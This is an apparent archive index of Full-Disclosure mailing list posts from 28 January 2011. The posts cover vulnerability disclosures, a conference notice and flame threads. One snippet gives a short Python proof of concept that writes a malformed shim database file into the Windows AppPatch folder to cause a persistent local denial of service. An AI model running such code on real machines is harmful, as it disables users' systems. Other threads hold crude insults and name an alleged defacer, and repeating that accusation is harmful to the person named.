Re: [Full-disclosure] sourceforge entry point seems still active.

2011-01-28 Thread exploit dev
Another update from HN and official response from sourceforge team:
the sourceforge entry point seems still active http://extraexploit.blogspot.com/2011/01/sourceforge-entry-point-seems-still.html
Sourceforge servers compromised http://news.ycombinator.com/item?id=2150639
SourceForge.net Attack

Re: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed

2011-01-28 Thread huj huj huj
haa haaa now weev is getting it in the ass both in and out of prison 2011/1/27 Leon Kaiser litera...@gmail.com BIG UPS TO KRASHED *Leon Kaiser* - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr

[Full-disclosure] FreeBSD local denial of service - forced reboot

2011-01-28 Thread HI-TECH .
# Exploit Title: FreeBSD local denial of service - forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE
This source code when compiled and executed will reboot at least FreeBSD 8.0-RELEASE because of

[Full-disclosure] Egypt Telecom AS isolation - BGPlay show it ?

2011-01-28 Thread exploit dev
If you are interested http://extraexploit.blogspot.com/2011/01/egypt-telecom-as-isolation-bgplay-show.html Regards -- http://extraexploit.blogspot.com ___ Full-Disclosure - We believe in it. Charter:

[Full-disclosure] nullcon Goa Dwitiya security Conference 25-26th Feb 2011

2011-01-28 Thread nullcon
Greetings from null! null - The open security community (registered non-profit society) is back with nullcon Goa Dwitiya - International Security Hacking conference. We have some amazing talks lined up this time around that will surely change your perspective of security in the future. We thank

[Full-disclosure] Malformed Package Appfix files - Local Persistent Denial Of Service

2011-01-28 Thread SecuBox fRoGGz
; Proof-of-Concept, tested on WINDOWS XP SP2 5.1.2600 FR (thx momo)
#!/usr/bin/env python
import sys
f=open('C:\\WINDOWS\\AppPatch\\systest.sdb','w')
f.write('\x02\x00\x00\x00\xFF\xFF\x00\x00\x73\x64\x62\x66\x02\x78\xFF\xFF\x00\x00')
f.close()
Note: Make sure you have sufficient permissions to

[Full-disclosure] Go away anonymous

2011-01-28 Thread RandallM
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Go away anonymous

2011-01-28 Thread huj huj huj
wow cool story bro 2011/1/28 RandallM randa...@fidmail.com

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

2011-01-28 Thread Leon Kaiser
Actually, it was a former member of Goatse Security. (http://security.goatse.fr/gaping-hole-exposed) Leon Leon Kaiser - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr http://gnaa.eu ||

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

2011-01-28 Thread Leon Kaiser
The person who did it was not a member of Goatse Security. It was a moron who thought that this would be funny. (The person in question is the guy who actually posted it on Full-Disclosure in the first place, Andrew Kirch) Leon Leon Kaiser

[Full-disclosure] Andrew trelane Kirch EXPOSED

2011-01-28 Thread Leon Kaiser
http://www.dailytech.com/Goatse+Security+Defaced+Perpetrators+Alleged+Identity+Revealed+/article20776.htm Leon Kaiser - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr http://gnaa.eu ||

Re: [Full-disclosure] Andrew trelane Kirch EXPOSED

2011-01-28 Thread Benji
Good god no-one cares. Sent from my BlackBerry® wireless device -Original Message- From: Leon Kaiser litera...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 28 Jan 2011 09:25:13 To: full-disclosure@lists.grok.org.uk Reply-To: litera...@gnaa.eu Subject:

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

2011-01-28 Thread Zach C
At the risk of having the eyes of the spiteful turned on me... It's kind of funny how these sorts of groups seem to be governed by a pursuit of the lulz -- that is, personal amusement/schadenfreude at the expense of someone else, usually as a result of their own actions. But ironically, if Mr.

Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml

2011-01-28 Thread Michal Zalewski
FYI, here's a provisional advisory from Microsoft acknowledging this issue: http://www.microsoft.com/technet/security/advisory/2501696.mspx /mz

[Full-disclosure] Vulnerabilities in Adobe ColdFusion

2011-01-28 Thread MustLive
Hello list! I want to warn you about SQL DB Structure Extraction, Full path disclosure and Cross-Site Scripting vulnerabilities in Adobe ColdFusion. The vulnerabilities exist on the detailed error report page. On 16.11.2010 I privately informed Adobe about it, but they ignored my letter.

Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)

2011-01-28 Thread ghost
it seems to be not quite so funny for the lulz-seekers when it happens to them. http://www.dailytech.com/Goatse+Security+Defaced+Perpetrators+Alleged+Identity+Revealed+/article20776.htm

Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml

2011-01-28 Thread IEhrepus
nice work to MS now, let us wait for the FIX . . gogogo hitest 2011/1/28 Michal Zalewski lcam...@coredump.cx: FYI, here's a provisional advisory from Microsoft acknowledging this issue: http://www.microsoft.com/technet/security/advisory/2501696.mspx /mz